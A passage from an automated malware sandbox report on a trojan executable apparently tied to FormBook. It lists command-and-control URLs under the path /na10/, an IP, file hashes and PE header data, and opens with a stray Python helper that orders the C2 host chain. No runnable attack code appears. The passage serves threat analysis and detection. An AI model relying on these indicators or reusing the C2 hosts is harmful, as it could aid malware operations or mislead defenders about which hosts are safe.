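        hosts.add(host)
        if nxt:
            successor[host] = nxt
            hosts.add(nxt)
        if rec["label"] == "malware":
            labels[host] = "malware"
        else:
            labels.setdefault(host, rec["label"])
    if len(campaigns) != 1:
        raise ValueError(f"expected one campaign path, got {sorted(campaigns)}")
    # The list head is the one host that no string names as a successor.
    heads = hosts - set(successor.values())
    order, seen = [], set()
    cur = heads.pop() if len(heads) == 1 else None
    while cur and cur not in seen:
        order.append(cur)
        seen.add(cur)
        cur = successor.get(cur)
    return campaigns.pop(), order, labels


if __name__ == "__main__":
    campaign, order, labels = c2_chain(REPORT_ROWS)
    print(f"campaign path: /{campaign}/  ({len(order)} hosts)")
    for i, host in enumerate(order, 1):
        print(f"{i:2d}. {host:28s} {labels.get(host, '-')}")
```

Run on the rows above this yields the single campaign path na10 and a 16-host chain that starts at www.osthirmaker.com and ends at www.jakobniinja.xyz (whose string ends in a stray "e" rather than a further host); only www.nona23.lat and www.productivagc.com carry the "malware" label, the rest are "safe" at scan time, which is why the host list rather than the reputation column is the IOC worth keeping.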
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.nftees.tech | 217.160.0.1 | true | true | | unknown
www.osthirmaker.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
www.liamcollinai.com/na10/ | true | Avira URL Cloud: safe | unknown
http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.bz59.topReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.comon | explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thelonelyteacup.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nbvci.xyz/na10/www.abc8bet6.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.giorgiaclerico.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nftees.tech/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.productivagc.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dexcoenergy.com/na10/www.hokivegasslots.club | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abc8bet6.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.giorgiaclerico.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000007.00000000.2508398700.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3305263776.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sasoera.com/na10/www.liamcollinai.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bz59.top/na10/www.jakobniinja.xyz | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nbvci.xyzReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nftees.techReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nona23.lat/na10/www.giorgiaclerico.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.snykee.com/na10/www.awclog.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micro | explorer.exe, 00000007.00000000.2501022529.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2501770890.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3301294769.0000000008870000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.dexcoenergy.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nbvci.xyz | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hokivegasslots.club/na10/www.thelonelyteacup.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.osthirmaker.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liamcollinai.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.snykee.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.osthirmaker.com/na10/www.nftees.tech | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abc8bet6.com/na10/www.productivagc.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.awclog.com/na10/www.sasoera.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nftees.tech/na10/www.nbvci.xyz | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.awclog.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.osthirmaker.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.snykee.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nbvci.xyz/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000007.00000002.3305263776.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2508398700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.giorgiaclerico.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liamcollinai.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nona23.latReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.productivagc.com/na10/www.dexcoenergy.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://wns.windows.com/)s | explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nftees.tech | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000007.00000000.2509419071.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2652534535.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2509419071.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3306031223.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hokivegasslots.club/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liamcollinai.com/na10/www.nona23.lat | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nona23.lat | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.awclog.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thelonelyteacup.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hokivegasslots.clubReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jakobniinja.xyz | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.productivagc.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abc8bet6.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jakobniinja.xyz/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liamcollinai.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.snykee.comReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.awclog.com/na10/ | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com | explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009D42000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thelonelyteacup.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.osthirmaker.com | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jakobniinja.xyzReferer: | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jakobniinja.xyz/na10/e | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.giorgiaclerico.com/na10/www.bz59.top | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hokivegasslots.club | explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp | false
              • Avira URL Cloud: safe
              unknown
              http://www.sasoera.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000002.3299618126.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.bz59.topexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.sasoera.comReferer:explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.dexcoenergy.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.dexcoenergy.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.msn.com/explorer.exe, 00000007.00000000.2502264257.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.thelonelyteacup.com/na10/www.snykee.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ns.adobe.yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.productivagc.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.vexplorer.exe, 00000007.00000000.2496782788.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://iptc.org/std/Iptc4xmdeyaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.sasoera.comexplorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.bz59.top/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.nona23.lat/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.abc8bet6.com/na10/explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              217.160.0.1 | www.nftees.tech | Germany | 8560 | ONEANDONE-AS Brauerstrasse 48 DE | true
              Joe Sandbox version: 40.0.0 Tourmaline
              Analysis ID: 1465386
              Start date and time: 2024-07-01 15:53:18 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 8m 25s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed: 11
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: yaM8XR1HfL.exe (renamed because original name is a hash value)
              Original Sample Name: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98.exe
              Detection: MAL
              Classification: mal100.troj.evad.winEXE@10/1@2/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 209
              • Number of non-executed functions: 114
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes were analyzed; the report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: yaM8XR1HfL.exe
              Time | Type | Description
              09:54:50 | API Interceptor | 6x Sleep call for process: yaM8XR1HfL.exe modified
              09:55:00 | API Interceptor | 652x Sleep call for process: explorer.exe modified
              09:55:36 | API Interceptor | 457235x Sleep call for process: WWAHost.exe modified
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              217.160.0.1 | Aposporogony.exe | malicious | FormBook, GuLoader
              • www.codemars.academy/nqhc/?r4txB=HWUkI9TTae9E16Ico4VYIxYl96Wd6gyAbZTC2FoY75Z91OR/nsTZW6u7F26sGGS3r1HZf2jS9pu5KUGpbE/+fGNm2HkM109OTw==&b6=1b9p
              217.160.0.1 | Proforma Fatura Hk..exe | malicious | FormBook
              • www.costa-del-sol.email/oy10/?O6j0pt-H=Izx4t1n+Rf3Ca+hvFKJVzS7z6yqKmy5N8eBT+7/R7lCHRBcOd+zbWzFHGx7cyqFTaQhR1cgXEQ==&zJBP0b=_HshZx40LLo8FJ-p
              217.160.0.1 | AWB18500182174_11355.exe | malicious | FormBook
              • www.lesmarines.online/en27/?wVU=7nW0dRrhkf&Dz=jP3mx/WBrAowWkuRRogLKNJAgIRHsPkXLr3i9dvTIbx1ZgmXy3n13YA+/GTjthircZJO
              217.160.0.1 | SecuriteInfo.com.Trojan.PackedNET.1474.27528.exe | malicious | FormBook
              • www.palma-mallorca.email/o85a/?ZPwhCf=L0bOj3F+Us1Wr6G8phOr+mrYBB5K4uWQ2s3SoNHCO9Y6VdWsp6bd9OWIjIalJ1l7ZuBU&uFQh=Rh0Da8TXt
              217.160.0.1 | PROFORMA INV-98876374.xlsx | malicious | FormBook
              • www.regensburg-ferienwohnung.com/n6g4/?oXEl=FdjjBPDfgPOpjR5dSaZEg+KecPu2EqbU9FY+ND8ScrQ1GAaxqnTck+f9zndzapeNPZAufw==&xfR=-ZG0UV2xhHTT9
              No context
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              ONEANDONE-AS Brauerstrasse 48 DE | https://www.asarco.com/ | malicious | Unknown
              • 74.208.236.164
              ONEANDONE-AS Brauerstrasse 48 DE | Att0027592.exe | malicious | FormBook
              • 217.76.156.252
              ONEANDONE-AS Brauerstrasse 48 DE | AWB 112-17259653.exe | malicious | FormBook
              • 217.160.0.144
              ONEANDONE-AS Brauerstrasse 48 DE | scan19062024.exe | malicious | FormBook
              • 212.227.172.254
              ONEANDONE-AS Brauerstrasse 48 DE | SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown
              • 217.160.0.130
              ONEANDONE-AS Brauerstrasse 48 DE | SecuriteInfo.com.Win32.Malware-gen.371.3693.exe | malicious | Unknown
              • 217.160.0.130
              ONEANDONE-AS Brauerstrasse 48 DE | Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook
              • 74.208.236.247
              ONEANDONE-AS Brauerstrasse 48 DE | Fiyat ARH-4532817-PO 45328174563.exe | malicious | FormBook
              • 212.227.172.254
              ONEANDONE-AS Brauerstrasse 48 DE | Fiyat ARH-4532817-PO 45328174563.exe | malicious | FormBook
              • 212.227.172.254
              ONEANDONE-AS Brauerstrasse 48 DE | 7ZEAQv0SZ6.elf | malicious | Mirai, Moobot
              • 212.227.30.65
              No context
              No context
              Process: C:\Users\user\Desktop\yaM8XR1HfL.exe
              File Type: ASCII text, with CRLF line terminators
              Category: dropped
              Size (bytes): 1216
              Entropy (8bit): 5.34331486778365
              Encrypted: false
              SSDEEP: 24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
              MD5: 7B709BC412BEC5C3CFD861C041DAD408
              SHA1: 532EA6BB3018AE3B51E7A5788F614A6C49252BCF
              SHA-256: 733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
              SHA-512: B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
              Malicious: true
              Reputation: moderate, very likely benign file
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
              File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit): 7.190368995705621
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              • Win32 Executable (generic) a (10002005/4) 49.75%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Windows Screen Saver (13104/52) 0.07%
              • Generic Win/DOS Executable (2004/3) 0.01%
              File name: yaM8XR1HfL.exe
              File size: 814'080 bytes
              MD5: 64a5e155baded9185ecd1fa9946c13aa
              SHA1: 4e7c62d7d5b1353bfc0e0220ae89e5409201bc70
              SHA256: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98
              SHA512: aef9499d737b198c45b1c88968bd871a85a0c16fe284f5a4477444580db158db3912db66f8a353b21a0ad727c09fcb2741e6c578c6b8d6179c089c5d59977985
              SSDEEP: 12288:6+S+SFXRuTwyC6flXB3pAJFvkP5UfazdkZRavD7R5GfYG2ucIjkM:XwRuljp0v6U0SZGhGVC
              TLSH: DC05F08A17E56914E1BF77B47A74905047F3B6DBD822C24F088952EE3B73B806D817A3
              File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.........."...P..@...*......._... ...`....@.. ....................................`................................
              Icon Hash: cf81080c8c8e884f
              Entrypoint: 0x4c5f0e
              Entrypoint Section: .text
              Digitally signed: false
              Imagebase: 0x400000
              Subsystem: windows gui
              Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp: 0x5CEBCB17 [Mon May 27 11:33:43 2019 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major: 4
              OS Version Minor: 0
              File Version Major: 4
              File Version Minor: 0
              Subsystem Version Major: 4
              Subsystem Version Minor: 0
              Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc5eb8 | 0x53 | .text
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc6000 | 0x27c4 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
